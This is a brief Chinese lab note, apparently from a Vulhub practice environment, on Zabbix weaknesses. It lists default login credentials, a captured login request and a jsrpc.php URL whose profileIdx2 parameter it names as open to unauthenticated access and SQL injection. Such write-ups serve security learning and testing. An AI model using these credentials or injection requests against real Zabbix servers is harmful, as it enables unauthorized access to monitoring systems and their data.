【vluhub】zabbix漏洞

介绍：

zabbix是对服务器资源状态例如、内存空间、CPU、程序运行状态进行检测、设置预警值、短信设置等功能等一款开源工具。配置不当存在未授权,SQL注入漏洞

弱口令

name=admin&password=zabbix

name=guest&password=

POST /index.php HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.203.12:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.203.12:8080/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6cmua046gkq78jai8ija37f7f5; tab=0; zbx_sessionid=37a3075c6ba46f1956c5d8d851c2e635
Connection: keep-alive

sid=56c5d8d851c2e635&form_refresh=1&name=admin&password=zabbix&autologin=1&enter=Sign+in

未授权访问直接进入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

 SQL注入

http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1

profileIdx2参数存在注入点

可使用sqlmap跑，此处忽略